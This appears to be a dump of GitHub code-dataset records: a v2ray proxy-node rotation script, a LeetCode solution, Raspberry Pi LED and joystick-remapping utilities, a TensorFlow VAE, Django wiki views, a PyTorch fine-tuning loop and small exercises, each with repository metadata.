parse_vmess(vmess, code=True):\n\tvmess = vmess[8:]\n\tif vmess[-1] == \"=\" or not (len(vmess) % 4):\n\t\tconfig = base64.b64decode(vmess)\n\telse:\n\t\tconfig = base64.b64decode(vmess + '=' * (4 - len(vmess) % 4))\n\tif code:\n\t\tconfig = config.decode(\"utf-8\")\n\treturn config\n\n\n# json反序列化\ndef load_config(config):\n\treturn json.loads(config)\n\n\n# 写入配置文件\ndef write2config(config):\n\twith open(config_path, \"r+\") as fd:\n\t\tserver_config = json.loads(fd.read())\n\t\t# unused: type\n\t\t# used: host path add port id aid net\n\t\t# useless: ps tls\n\n\t\t# 设置vnext: add port id\n\t\tserver_config['outbounds'][0]['settings']['vnext'][0]['address'] = config['add'] # address\n\t\tserver_config['outbounds'][0]['settings']['vnext'][0]['port'] = int(config['port']) # port\n\t\tserver_config['outbounds'][0]['settings']['vnext'][0]['users'][0]['id'] = config['id'] # id\n\t\tserver_config['outbounds'][0]['settings']['vnext'][0]['users'][0]['alterID'] = int(config['aid']) # aid\n\n\t\t# 如果net不是ws没有进行下去的意义了\n\t\tif config['net'] != \"ws\":\n\t\t\texit(1)\n\t\t\n\t\t# 设置ws: host path\n\t\tserver_config['outbounds'][0]['streamSettings']['wsSettings']['headers']['Host'] = config['host'] # host\n\t\tserver_config['outbounds'][0]['streamSettings']['wsSettings']['path'] = config['path'] # path\n\n\t\t# 设置tls: host\n\t\tserver_config['outbounds'][0]['streamSettings']['tlsSettings']['serverName'] = config['host'] # serverName\n\n\t\t# 设置network:net\n\t\tserver_config['outbounds'][0]['streamSettings']['network'] = config['net'] # network\n\n\t\t# 清空文件内容,重新写入\n\t\tfd.seek(0)\n\t\tfd.truncate()\n\t\tfd.write(json.dumps(server_config, indent=4))\n\n\n# 测试是否可达\ndef is_reachable(ip, times=3, timeout=3, count=1):\n\tfor i in range(int(times)):\n\t\ttry:\n\t\t\tret = subprocess.Popen(\"ping -c {} -W {} {}\".format(count, timeout, ip), shell=True)\n\t\t\tret.wait(3) # 等待三秒\n\t\texcept Exception:\n\t\t\t# log(LOG_ERR, \"is_reachable\", e)\n\t\t\tlogging.error(\"{} is unreachable\".format(ip))\n\t\tif ret.returncode == 0:\n\t\t\tlogging.info(\"{} is reachable\".format(ip))\n\t\t\treturn True\n\t\telse:\n\t\t\ttime.sleep(1)\n\treturn False\n\n\n# 测试是否可访问Google\ndef is_accessable():\n\tglobal net_test_lists\n\tfor net in net_test_lists:\n\t\tcommand = 'curl --insecure --proxy socks5://127.0.0.1:1080 -s -I -m 5 -o /dev/null -w %{{http_code}} {}'.format(net)\n\t\tret = 
os.popen(command).read()\n\t\tlogging.info(\"access {} http_code is:{}\".format(net, ret))\n\t\tif ret == \"200\":\n\t\t\treturn True\n\treturn False\n\n\n# restart v2ray\ndef restart_v2ray(times=3):\n\tlogging.info(\"restart v2ray service\")\n\twith open(scripts_log, \"a+\") as fd:\n\t\tfor i in range(int(times)):\n\t\t\tret = subprocess.Popen(\"systemctl restart v2ray || systemctl start v2ray\", shell=True, stdout=fd, stderr=fd)\n\t\t\tret.wait(10) # 等待十秒\n\t\t\tif ret.returncode == 0:\n\t\t\t\tlogging.info(\"success restarted v2ray\")\n\t\t\t\treturn True\n\t\t\telse:\n\t\t\t\tlogging.error(\"failed to restart v2ray retries {}/{}\".format(i + 1, times))\n\t\t\t\ttime.sleep(2)\n\treturn False\n\n\n# 自动更新配置信息\ndef update_config():\n\t# 从订阅服务器获取\n\tsubscription = get_subscription(url, True)\n\n\t# 解析订阅服务器\n\tvmesses = parse_subscription(subscription)\n\n\t# 解析节点配置信息\n\tserveres = list()\n\tfor v in vmesses:\n\t\tconfig = parse_vmess(v)\n\t\tserveres.append(load_config(config))\n\n\t# 找一个可用的节点重新生成配置文件\n\tfor it in serveres:\n\t\tif is_reachable(it['add']): # 测试是否可达\n\t\t\tlogging.info(\"{} is reachable\".format(it['add']))\n\t\t\twrite2config(it) # 写入配置文件\n\t\t\trestart_v2ray(3) # 重新启动v2ray\n\t\t\ttime.sleep(10) # 等待v2ray.service重启起来\n\t\t\tif is_accessable(): # 测试是否可以访问google\n\t\t\t\treturn\n\t\t\tlogging.info(\"{} can't use for access google\".format(it['add']))\n\t\telse:\n\t\t\tlogging.info(\"try other server\")\n\t\t\ttime.sleep(1)\n\n\tlogging.info(\"no server can be used, exit\")\n\texit(1)\n\n\n# 初始化\ndef init():\n\t# 创建日志目录\n\tif not os.path.exists(os.path.dirname(scripts_log)):\n\t\tos.makedirs(os.path.dirname(scripts_log))\n\n\t# 创建文件\n\tif not os.path.isfile(scripts_log):\n\t\tos.system(\"touch {}\".format(scripts_log))\n\n\nif __name__ == \"__main__\":\n\tinit() # 初始化\n\n\twhile True:\n\t\tif is_accessable(): # 可以访问google\n\t\t\t# 三十分钟到六十分钟睡眠\n\t\t\tseconds = 60 * random.randint(30, 50) + random.randint(1, 600)\n\t\t\tlogging.info(\"can access google, ready to sleep {} seconds\".format(seconds))\n\t\t\ttime.sleep(seconds) # 等待n久后,重测与google的链接\n\t\telse:\n\t\t\tlogging.error(\"can't access google, try other server\")\n\t\t\tupdate_config() # 更新配置信息\n\t\t\tlogging.info(\"success update v2ray config\")\n\n","repo_name":"jianmo-z/MyTools","sub_path":"auto-update-v2ray-conf/scripts.py","file_name":"scripts.py","file_ext":"py","file_size_in_byte":5891,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"40"} +{"seq_id":"17686662242","text":"class Solution:\n def longestCommonPrefix(self, strs):\n count_len = []\n for i in arr:\n count_len.append(len(i))\n min_len = min(count_len)\n min_str_index = count_len.index(min_len)\n min_str = strs[min_str_index]\n result= ''\n count_number=0\n \n for st in strs:\n max_index = []\n for i in range(min_len):\n if min_str[i]==st[i]:\n max_index.append(i)\n count_number+=1\n else:\n break\n if count_number== len(strs):\n return min_str[:min(max_index)-1]\n else:\n return \"\"\nif __name__ == '__main__':\n sol = Solution()\n \n arr = [\"flower\",\"flow\",\"flight\"]\n print(sol.longestCommonPrefix(arr))","repo_name":"Shadin710/Leetcode","sub_path":"string/longest_common_prefix.py","file_name":"longest_common_prefix.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"73937977719","text":"import RPi.GPIO as GPIO\nimport time\n\ncolor = [0xff00, 0x00ff, 0x0ff0, 0xf00f]\nRpin = 12\nGpin = 13\n\ndef setup():\n 
GPIO.setmode(GPIO.BCM)\n GPIO.setwarnings(False)\n GPIO.setup(Rpin, GPIO.OUT)\n GPIO.setup(Gpin, GPIO.OUT)\n \n GPIO.output(Rpin,GPIO.LOW)\n GPIO.output(Gpin, GPIO.LOW)\n\n global p_R, p_G\n p_R = GPIO.PWM(Rpin, 2000)\n p_G = GPIO.PWM(Gpin, 2000)\n\n p_R.start(0)\n p_G.start(0)\n\ndef map(x, in_min, in_max, out_min, out_max):\n return (x - in_min)*(out_max - out_min)/(in_max - in_min) + out_min\n\ndef setColor(col):\n R_val = col >> 8\n G_val = col & 0x00ff\n\n R_val = map(R_val, 0, 255, 0, 100)\n G_val = map(G_val, 0, 255, 0, 100)\n\n p_R.ChangeDutyCycle(R_val)\n p_G.ChangeDutyCycle(G_val)\n \ndef bright(x):\n GPIO.output(Rpin, 1)\n GPIO.output(Gpin, 1)\n p_R.ChangeDutyCycle(100)\n p_G.ChangeDutyCycle(100)\n time.sleep(x)\n GPIO.output(Rpin, GPIO.LOW)\n GPIO.output(Gpin, GPIO.LOW)\n time.sleep(x)\n\ndef loop():\n while True:\n for col in color:\n setColor(col)\n time.sleep(0.5)\n\ndef destroy():\n p_R.stop()\n p_G.stop()\n GPIO.output(Rpin, GPIO.LOW)\n GPIO.cleanup()\n\nif __name__ == '__main__':\n setup()\n time.sleep(5)\n try:\n loop()\n except KeyboardInterrupt:\n destroy()\n","repo_name":"atiger808/raspberry","sub_path":"ZKDEMO/01_dule_color_led.py","file_name":"01_dule_color_led.py","file_ext":"py","file_size_in_byte":1306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"8464247257","text":"from evdev import InputDevice, UInput, categorize, ecodes as e\nimport time\nimport evdev\nfrom enum import Enum\nfrom evdev.eventio_async import asyncio\nfrom pynotifier import Notification\nimport os\n\n\nclass InputType(Enum):\n KEYBOARD = 0\n MOUSE = 1\n\nclass AliexpressJoystickMapper:\n def __init__(self, dev_path : str, DEFAULT_MODE : InputType = InputType.KEYBOARD, TIME_DELAY : float=0.2):\n self.mode = DEFAULT_MODE\n self.TIME_DELAY = TIME_DELAY\n\n self.dev = evdev.InputDevice(dev_path)\n self.ui = UInput.from_device(self.dev, name='Keyboard remapped from joystick')\n\n self.dev.grab()\n \n def run(self):\n loop = asyncio.get_event_loop()\n loop.run_until_complete(self.mouse_joystick_event())\n\n def toggle_mode(self):\n dir_path = os.path.abspath(os.path.dirname(__file__))\n if self.mode == InputType.KEYBOARD:\n self.mode = InputType.MOUSE\n icon_path = os.path.join(dir_path, 'icons/input-mouse.svg')\n else:\n self.mode = InputType.KEYBOARD\n icon_path = os.path.join(dir_path, 'icons/input-keyboard.svg')\n\n print(icon_path)\n # message(\"Some title\", \"Changed mode\")\n \n Notification(\n title='Joystick mode changed',\n description=f'Mode is: {self.mode.name}',\n icon_path=icon_path,\n duration=2, # Duration in seconds\n urgency='normal'\n ).send()\n\n\n\n\n async def mouse_joystick_event(self):\n prev_timestamp = 0\n\n async for ev in self.dev.async_read_loop():\n elapsed = ev.timestamp() - prev_timestamp\n\n # Keyboard mode\n if self.mode == InputType.KEYBOARD:\n if ev.type == evdev.ecodes.EV_REL and elapsed > self.TIME_DELAY:\n if ev.code == evdev.ecodes.REL_X:\n if ev.value > 0:\n self.ui.write(e.EV_KEY, e.KEY_RIGHT, 1) # KEY_RIGHT press\n self.ui.write(e.EV_KEY, e.KEY_RIGHT, 0) # KEY_RIGHT release\n elif ev.value < 0:\n self.ui.write(e.EV_KEY, e.KEY_LEFT, 1) # KEY_LEFT press\n self.ui.write(e.EV_KEY, e.KEY_LEFT, 0) # KEY_LEFT release\n\n elif ev.code == evdev.ecodes.REL_Y:\n if ev.value < 0:\n self.ui.write(e.EV_KEY, e.KEY_UP, 1) # KEY_UP press\n self.ui.write(e.EV_KEY, e.KEY_UP, 0) # KEY_UP release\n elif ev.value > 0:\n self.ui.write(e.EV_KEY, e.KEY_DOWN, 1) # KEY_DOWN press\n self.ui.write(e.EV_KEY, e.KEY_DOWN, 0) # KEY_DOWN release\n\n 
self.ui.syn()\n prev_timestamp = ev.timestamp()\n if ev.type == evdev.ecodes.EV_KEY and elapsed > self.TIME_DELAY:\n if ev.code == evdev.ecodes.BTN_LEFT:\n self.ui.write(e.EV_KEY, e.KEY_ENTER, 1)\n self.ui.write(e.EV_KEY, e.KEY_ENTER, 0)\n if ev.code == evdev.ecodes.BTN_SIDE:\n self.ui.write(e.EV_KEY, e.KEY_BACKSPACE, 1)\n self.ui.write(e.EV_KEY, e.KEY_BACKSPACE, 0)\n if ev.code == evdev.ecodes.KEY_VOLUMEDOWN: # Toggle mode\n self.toggle_mode()\n prev_timestamp = ev.timestamp()\n self.ui.syn()\n\n # Mouse self.mode\n elif self.mode == InputType.MOUSE and not (ev.type == evdev.ecodes.EV_KEY and ev.code == evdev.ecodes.KEY_VOLUMEDOWN):\n self.ui.write_event(ev)\n self.ui.syn()\n elif (ev.type == evdev.ecodes.EV_KEY and ev.code == evdev.ecodes.KEY_VOLUMEDOWN) and elapsed > self.TIME_DELAY:\n if ev.code == evdev.ecodes.KEY_VOLUMEDOWN: # Toggle mode\n self.toggle_mode()\n prev_timestamp = ev.timestamp()\n self.ui.syn()\n\n\nimport sys\n\ndef main():\n args = sys.argv[1:]\n print(args)\n dev_path = args[0]\n print(dev_path)\n\n ali_joy = AliexpressJoystickMapper(dev_path)\n ali_joy.run()\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"Risto97/vrpark_remap","sub_path":"vr_park_remap.py","file_name":"vr_park_remap.py","file_ext":"py","file_size_in_byte":4273,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"35428775132","text":"import pandas as pd\nimport random\n\nARRSIZE = 10000000 #array size\n\nascending_sorted = [x for x in range(0, ARRSIZE)] #sorted array in ascending order\ndescending_sorted = [x for x in range(ARRSIZE, 0, -1)] #sorted array in descending order\ndf = pd.DataFrame({'Ascending': ascending_sorted, 'Descending': descending_sorted}) #initialise dataset with two columns of sorted arrays\n\nitersize = 10\ncount = 0\nwhile count < itersize: #generate columns with values in random order\n colname = 'rand' + str(count) #generate column name\n df[colname] = [random.randint(0, ARRSIZE) for x in range(0, ARRSIZE)] #add new column with new random array\n count += 1\n\ndf.to_csv(\"exampleClass1DatasetSize\" + str(ARRSIZE) +\".csv\")\n\nprint(df)","repo_name":"Jabezng2/SC2001-AlgoDesign-Analysis","sub_path":"Example Class 1/datasetgeneration.py","file_name":"datasetgeneration.py","file_ext":"py","file_size_in_byte":727,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"36919070009","text":"'''\nVAE that also takes a y features array and tries to steer some latent features to map to given features\nMost of the code is identical to vae.py\n'''\n\nimport numpy as np\nimport tensorflow as tf\n\nfrom tensorflow.distributions import Normal\nfrom tensorflow.distributions import Bernoulli\n\nclass SteeredVAE:\n \n def __init__(self, n_input, n_list, n_y=None,y_weight=100):\n '''\n n_input - number of input neurons\n n_list - list of numbers of neurons in the hidden layers\n n_y: optional - number of features that will be given as input y during training\n y_weight - relative weight of losses (VAE vs regression for y features). 
Trial-and-error\n '''\n # input data\n self.X = tf.placeholder(tf.float32, shape=(None, n_input))\n # input y features\n if (n_y is not None):\n self.y = tf.placeholder(tf.float32, shape=(None, n_y))\n \n # encoder\n self.encoder_layers = []\n # input layer\n previous = n_input\n # current is the output of each layer (skip last because there is nothing after it)\n for current in n_list[:-1]:\n h = DenseLayer(previous,current)\n self.encoder_layers.append(h)\n previous = current\n # latent features number\n latent = n_list[-1]\n encoder_output = DenseLayer(current,latent*2,activation='none')\n self.encoder_layers.append(encoder_output)\n \n # feed forward through encoder\n c_X = self.X\n for layer in self.encoder_layers:\n c_X = layer.feed_forward(c_X)\n # c_X now holds the output of the encoder\n # first half are the means\n self.means = c_X[:,:latent]\n # second half are the std; must be positive; +1e-6 for smoothing\n self.std = tf.nn.softplus(c_X[:,latent:]) + 1e-6\n \n # optional loss for steered latent features\n if (n_y is not None):\n self.yhat = self.means[:,:n_y]\n self.error = tf.losses.mean_squared_error(labels=self.y,predictions=self.yhat)\n \n # reparameterization trick\n normal = Normal(loc=self.means,scale=self.std)\n self.Z = normal.sample()\n\n # decoder\n self.decoder_layers = []\n previous = latent\n for current in reversed(n_list[:-1]):\n h = DenseLayer(previous,current)\n self.decoder_layers.append(h)\n previous = current\n # output is the reconstruction\n decoder_output = DenseLayer(previous,n_input,activation=lambda x:x)\n self.decoder_layers.append(decoder_output)\n\n #feed forward through decoder, using the sampled 'data'\n c_X = self.Z\n for layer in self.decoder_layers:\n c_X = layer.feed_forward(c_X)\n logits = c_X\n # use logits for cost function below\n neg_cross_entropy = -tf.nn.sigmoid_cross_entropy_with_logits(labels=self.X,\n logits=logits)\n neg_cross_entropy = tf.reduce_sum(neg_cross_entropy, 1)\n \n # output\n self.y_prob = Bernoulli(logits=logits)\n \n # sample from output\n self.post_pred = self.y_prob.sample()\n self.post_pred_probs = tf.nn.sigmoid(logits)\n \n # generate 'de-novo' output\n self.gen = tf.Variable(0)\n Z_std = Normal(0.0,1.0).sample([self.gen,latent])\n c_X = Z_std\n for layer in self.decoder_layers:\n c_X = layer.feed_forward(c_X)\n logits = c_X\n \n prior_pred_dist = Bernoulli(logits=logits)\n self.prior_pred = prior_pred_dist.sample()\n self.prior_pred_probs = tf.nn.sigmoid(logits)\n \n # manually input Z\n self.Z_input = tf.placeholder(np.float32, shape=(None, latent))\n c_X = self.Z_input\n for layer in self.decoder_layers:\n c_X = layer.feed_forward(c_X)\n logits = c_X\n self.manual_prior_prob = tf.nn.sigmoid(logits)\n \n # cost function\n # Kullback–Leibler divergence\n kl = -tf.log(self.std) + 0.5*(self.std**2 + self.means**2) - 0.5\n kl = tf.reduce_sum(kl, axis=1)\n # ELBO\n self.elbo = tf.reduce_sum(neg_cross_entropy - kl)\n \n if (n_y is None):\n # only ELBO\n self.optimizer = tf.train.RMSPropOptimizer(learning_rate=0.001).minimize(-self.elbo)\n else:\n # weighted regression loss and ELBO\n self.optimizer = tf.train.RMSPropOptimizer(learning_rate=0.001).minimize(\n tf.reduce_sum(y_weight*self.error-self.elbo))\n\n self.init = tf.global_variables_initializer()\n self.session = tf.Session()\n self.session.run(self.init)\n \n def steer(self,X,y,epochs=10,batch=50):\n '''Replaces fit, user provides the y features for the latent steering'''\n n_batches = len(X) // batch\n for epoch in range(epochs):\n print('Epoch:',epoch+1)\n 
cost = 0\n e_cost = 0\n for b in range(n_batches):\n c_batch = X[b*batch:(b+1)*batch]\n y_batch = y[b*batch:(b+1)*batch]\n _,c,e, = self.session.run((self.optimizer, self.elbo,self.error),feed_dict={self.X: c_batch,self.y:y_batch})\n # accumulate cost\n cost+=c\n e_cost+=e\n print('Cost:', cost,e_cost)\n \n def fit(self,X,epochs=10,batch=50):\n n_batches = len(X) // batch\n for epoch in range(epochs):\n print('Epoch:',epoch+1)\n cost = 0\n for b in range(n_batches):\n c_batch = X[b*batch:(b+1)*batch]\n _,c, = self.session.run((self.optimizer, self.elbo),feed_dict={self.X: c_batch})\n # accumulate cost\n cost+=c\n print('Cost:', cost)\n \n def predict(self,X,out='prob'):\n '''\n Pass data through encoder and decoder and retrieve reconstructed output\n by default the probabilities are returned, user can specify 'sample' or 'both'\n '''\n # correct shape if needed\n if (X.ndim==1):\n X = X.reshape([1,-1])\n pred,prob,mm = self.session.run((self.post_pred,self.post_pred_probs,self.means),feed_dict={self.X:X})\n if (out=='prob'):\n return prob,mm\n elif (out=='sample'):\n return pred\n else:\n return pred,prob\n\n def generate(self,n=1,out='prob'):\n '''\n Generate output\n by default the probabilities are returned, user can specify 'sample' or 'both'\n User specifies the number of points requested \n '''\n pred,prob = self.session.run((self.prior_pred,self.prior_pred_probs),feed_dict={self.gen:n})\n if (out=='prob'):\n return prob\n elif (out=='sample'):\n return pred\n else:\n return pred,prob\n \n def feed(self,Z):\n '''Generate output using provided latent-space input Z'''\n # correct shape if needed\n if (Z.ndim==1):\n Z = Z.reshape([1,-1])\n return self.session.run(self.manual_prior_prob,feed_dict={self.Z_input:Z})\n \n def close(self):\n self.session.close()\n\nclass DenseLayer(object):\n '''A fully connected layer'''\n \n def __init__(self, n_in, n_out, activation=tf.nn.relu):\n '''number of input and output neurons; the activation function'''\n self.weights = tf.Variable(tf.random_normal(shape=(n_in, n_out), stddev=2/np.sqrt(n_in)))\n self.bias = tf.Variable(tf.constant(0.0,shape=[n_out]))\n if (activation=='none'):\n self.activation = lambda x: x\n else:\n self.activation = activation\n \n def feed_forward(self, X):\n '''Run input through layer and retrieve output'''\n return self.activation(tf.matmul(X, self.weights) + self.bias)\n\nif (__name__ == '__main__'):\n print('This module is not intended to run by itself')\n","repo_name":"ralhadeff/machine-learning-tools","sub_path":"VariationalAE/steered.py","file_name":"steered.py","file_ext":"py","file_size_in_byte":8002,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"70687781880","text":"# **************************************************************************** #\n# #\n# ::: :::::::: #\n# variance.py :+: :+: :+: #\n# +:+ +:+ +:+ #\n# By: jdussert <marvin@42.fr> +#+ +:+ +#+ #\n# +#+#+#+#+#+ +#+ #\n# Created: 2020/01/20 15:58:54 by jdussert #+# #+# #\n# Updated: 2020/01/20 16:44:08 by jdussert ### ########.fr #\n# #\n# **************************************************************************** #\n\nimport numpy as np\n \ndef variance(x):\n\t\"\"\"Computes the variance of a non-empty numpy.ndarray, using a for-loop.\n Args:\n x: has to be a numpy.ndarray, a vector.\n Returns:\n The variance as a float.\n None if x is an empty numpy.ndarray.\n Raises:\n This function should not raise any Exception.\n \"\"\"\n\tm = float(len(x))\n\tif m == 0:\n\t\treturn None\n\tmean_x = 
0\n\tvariance_x = 0\n\tfor nb in x:\n\t mean_x += float(nb)\n\tmean_x /= m\n\tfor nb in x:\n\t variance_x += float((nb - mean_x)**2)\n\tvariance_x /= m\n\treturn variance_x\n\n# Examples :\nX = np.array([0, 15, -9, 7, 12, 3, -21])\nprint(\"The variance is:\\n\", variance(X))\nprint(np.var(X))\n","repo_name":"JehanneDussert/bootcampPython","sub_path":"bootcamp_machineLearning/Day00/ex02/variance.py","file_name":"variance.py","file_ext":"py","file_size_in_byte":1549,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"19027640537","text":"limit = 104801\nimport sys\nimport math\nprime = []\nprime.append(1)\nprime.append(2)\ndef isprime(num):\n check = 1\n for i in range(1, len(prime)):\n if num % prime[i] == 0:\n check = 0\n break\n elif prime[i] > num //2:\n break\n if check == 1:\n prime.append(num)\n\nfor i in range (3,limit):\n isprime(i)\n \nt = int(input().strip())\nfor a0 in range(t):\n n = int(input().strip())\n print(prime[n])\n","repo_name":"AnimeshKumar2710/project-Euler","sub_path":"euler007.py","file_name":"euler007.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"36153490634","text":"from django.forms import widgets\nfrom django.http.response import HttpResponseRedirect\nfrom django.shortcuts import render\nfrom django.urls import reverse\nfrom django import forms\nfrom markdown2 import Markdown\nimport random\n\nfrom . import util\n\ndef index(request):\n return render(request, \"encyclopedia/index.html\", {\n \"entries\": util.list_entries()\n })\n\ndef search(request):\n if request.method == \"POST\":\n title = str(request.POST[\"q\"])\n titles = util.list_entries();\n if(title in titles):\n return HttpResponseRedirect(reverse(\"title\", args=(title,)))\n #return views.getTitle(request,title) #this could work, but we would stay on the /search link, and it is not good practice\n else:\n substring=[]\n for name in titles:\n if title in name:\n substring+=[name]\n #faster: [name for name in titles if title in name ]\n return render(request, \"encyclopedia/index.html\", {\n \"entries\": substring\n })\n\nclass Page(forms.Form):\n title = forms.CharField(label=\"Title:\")\n content = forms.CharField(widget=forms.Textarea)\n\ndef newPage(request):\n if request.method == \"POST\":\n page = Page(request.POST)\n if page.is_valid():\n title = page.cleaned_data[\"title\"]\n if util.get_entry(title):\n return render(request, \"encyclopedia/error.html\", {\n \"title\": \"Error\",\n \"content\": \"The page already exists\"\n })\n else:\n content = page.cleaned_data[\"content\"]\n util.save_entry(title, content)\n return HttpResponseRedirect(reverse(\"title\", args=(title,)))\n \n else:\n return render(request, \"encyclopedia/add.html\", {\n 'page': page\n })\n \n return render(request,\"encyclopedia/add.html\",{\n 'page': Page()\n })\n \nclass EditPageForm(forms.Form):\n content = forms.CharField(widget=forms.Textarea)\n\ndef edit(request, title):\n if request.method == \"POST\":\n page = EditPageForm(request.POST)\n if page.is_valid():\n content = page.cleaned_data[\"content\"]\n util.save_entry(title, content)\n return HttpResponseRedirect(reverse(\"title\", args=[title]))\n else:\n #messages.error(request, f'Editing form not valid, please try again!')\n return render(request, \"encyclopedia/edit.html\",{\n 'page': page,\n 'title': title\n })\n # if accessed from the entry page\n elif request.method == \"GET\":\n # if the page does not exist
\n content = util.get_entry(title)\n if ( content == None):\n return render(request, \"encyclopedia/error.html\", {\n \"title\": \"Error 404\",\n \"content\": \"page not found\"\n })\n\n return render(request, \"encyclopedia/edit.html\",{\n 'page': EditPageForm(initial={'content': content}),\n 'title': title\n })\n\ndef getTitle(request, title):\n content = util.get_entry(title)\n if(content):\n content_HTML = Markdown().convert(content)#converts md into html\n return render(request, \"encyclopedia/title.html\", {\n \"title\": title,\n # later, in entry.html, {{content|safe}} is used inside the braces \n # so the HTML is rendered instead of shown as raw text\n \"content\": content_HTML\n })\n else: \n return render(request, \"encyclopedia/error.html\", {\n \"title\": \"Error 404\",\n \"content\": \"page not found\"\n })\n\ndef randomPage(request):\n title = random.choice(util.list_entries())\n return HttpResponseRedirect(reverse('title',args=(title,))) \n","repo_name":"BiplopDey/wiki","sub_path":"encyclopedia/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"1013210944","text":"\"\"\"Train classifier for source dataset.\"\"\"\n\nimport torch.nn as nn\nimport torch.optim as optim\n\nfrom utils.utils import save_model\nfrom core.test import eval\n\n\ndef train_src(model, src_data_loader, tgt_data_loader_eval, device, params):\n \"\"\"Train classifier for source domain.\"\"\"\n ####################\n # 1. setup network #\n ####################\n\n # setup criterion and optimizer\n\n parameter_list = [\n {\n \"params\": get_parameters(model.features, 'weight'),\n \"lr\": 0.001\n },\n {\n \"params\": get_parameters(model.features, 'bias'),\n \"lr\": 0.002\n },\n {\n \"params\": get_parameters(model.fc, 'weight'),\n \"lr\": 0.01\n },\n {\n \"params\": get_parameters(model.fc, 'bias'),\n \"lr\": 0.02\n },\n ]\n optimizer = optim.SGD(parameter_list, momentum=0.9)\n criterion = nn.CrossEntropyLoss()\n\n ####################\n # 2. 
train network #\n ####################\n global_step = 0\n for epoch in range(params.num_epochs):\n for step, (images, labels) in enumerate(src_data_loader):\n model.train()\n global_step += 1\n adjust_learning_rate(optimizer, global_step)\n\n # make images and labels variable\n images = images.to(device)\n labels = labels.to(device)\n\n # zero gradients for optimizer\n optimizer.zero_grad()\n\n # compute loss for critic\n preds = model(images)\n loss = criterion(preds, labels)\n\n # optimize source classifier\n loss.backward()\n optimizer.step()\n\n # print step info\n if (global_step % params.log_step == 0):\n print(\"Epoch [{:4d}] Step [{:4d}]: loss={:.5f}\".format(\n epoch + 1, global_step, loss.data.item()))\n\n # eval model on test set\n if (global_step % params.eval_step == 0):\n eval(model, src_data_loader, device)\n eval(model, tgt_data_loader_eval, device)\n\n # save model parameters\n if (global_step % params.save_step == 0):\n save_model(\n model, params.src_dataset +\n \"-source-classifier-{}.pt\".format(global_step), params)\n\n # end\n if (global_step > params.max_step):\n break\n\n # save final model\n save_model(model, params.src_dataset + \"-source-classifier-final.pt\",\n params)\n\n return model\n\n\ndef adjust_learning_rate(optimizer, global_step):\n lr_0 = 0.01\n gamma = 0.001\n power = 0.75\n lr = lr_0 / (1 + gamma * global_step)**power\n #print('lr in step {} is {}'.format(global_step, lr))\n optimizer.param_groups[0]['lr'] = lr * 0.1\n optimizer.param_groups[1]['lr'] = lr * 0.2\n optimizer.param_groups[2]['lr'] = lr * 1\n optimizer.param_groups[3]['lr'] = lr * 2\n\n\ndef get_parameters(module, flag):\n \"\"\" flag = 'weight' or 'bias'\n \"\"\"\n for name, param in module.named_parameters():\n if flag in name:\n yield param","repo_name":"wogong/pytorch-office_finetune","sub_path":"core/pretrain.py","file_name":"pretrain.py","file_ext":"py","file_size_in_byte":3123,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"40"} +{"seq_id":"29030198558","text":"import unittest\nimport map\nimport readMap\nimport os\n\n\nclass p1(unittest.TestCase):\n def test(self):\n free1 = map.Free(0, 0)\n free3 = map.Free(0, 0)\n free3.setObstruction(3)\n free9 = map.Free(0, 0)\n free9.setObstruction(9)\n entry = map.Entry(0, 0)\n wall1 = map.Wall(0, 0)\n wall2 = map.Wall(0, 0)\n\n cells = [wall1, free1, free3, free9, entry, wall2]\n pairs = []\n for (i, cell) in enumerate(cells):\n potential_pairs = cells[i + 1 :]\n for pair in potential_pairs:\n pairs.append((cell, pair))\n\n student_answers = []\n for pair in pairs:\n student_answers.append(map.obstructionAddition(pair[0], pair[1]))\n reference_answers = [-1, -1, -1, -1, -1, 4, 10, -1, -1, 12, -1, -1, -1, -1, -1]\n\n for i in range(len(student_answers)):\n if student_answers[i] != reference_answers[i]:\n raise Exception(\n \"\\nCell 1: {} \\nCell 2: {} \\nExpected: {} Got: {}\".format(\n pairs[i][0],\n pairs[i][1],\n reference_answers[i],\n student_answers[i],\n )\n )\n\n\nclass p2(unittest.TestCase):\n def test(self):\n test_map = readMap.read(os.path.join(\"maps\", \"medium.map\"))\n entry = map.Entry(16, 6)\n wall = map.Wall(2, 10)\n free = map.Free(5, 5)\n reference_answers = [entry, wall, free]\n student_answers = [\n test_map.getCell(16, 6),\n test_map.getCell(2, 10),\n test_map.getCell(5, 5),\n ]\n student_answers_L = [\n test_map.getCellL(map.Locn(16, 6)),\n test_map.getCellL(map.Locn(2, 10)),\n test_map.getCellL(map.Locn(5, 5)),\n ]\n\n for (i, student_answer) in 
enumerate(student_answers):\n if student_answer != reference_answers[i]:\n raise Exception(\n \"\\ngetCell Expected: {} Got: {}\".format(\n reference_answers[i], student_answer\n )\n )\n\n for (i, student_answer) in enumerate(student_answers_L):\n if student_answer != reference_answers[i]:\n raise Exception(\n \"\\ngetCellL Expected: {} Got: {}\".format(\n reference_answers[i], student_answer\n )\n )\n\n\nclass p3(unittest.TestCase):\n def test(self):\n simple = readMap.read(os.path.join(\"maps\", \"simple.map\"))\n simple_v2 = readMap.read(os.path.join(\"maps\", \"simple_v2.map\"))\n medium = readMap.read(os.path.join(\"maps\", \"medium.map\"))\n medium_v2 = readMap.read(os.path.join(\"maps\", \"medium_v2.map\"))\n medium_v4 = readMap.read(os.path.join(\"maps\", \"medium_v4.map\"))\n\n maps = [simple, simple_v2, medium, medium_v2, medium_v4]\n map_names = [\"simple\", \"simple_v2\", \"medium\", \"medium_v2\", \"medium_v4\"]\n 